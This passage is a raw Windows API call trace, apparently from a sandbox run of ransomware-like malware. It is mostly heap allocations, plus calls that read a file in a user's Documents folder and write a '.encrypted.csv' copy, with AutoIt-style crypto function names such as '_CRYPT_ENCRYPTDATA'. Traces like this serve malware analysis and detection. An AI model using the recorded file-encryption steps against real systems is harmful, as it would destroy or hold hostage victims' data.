hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.395] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd")) returned 0x10 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.encrypted.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\pm4n5-.encrypted.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.396] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0036.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0036.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0036.397] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.397] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x1c01, lpOverlapped=0x0) returned 1 [0036.399] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c01) returned 0x955018 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c01) returned 0x956c28 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c01) returned 0x955018 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.401] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c01) returned 0x955018 [0036.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0036.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c01) returned 0x958838 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0036.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.403] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.403] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.404] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.405] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) 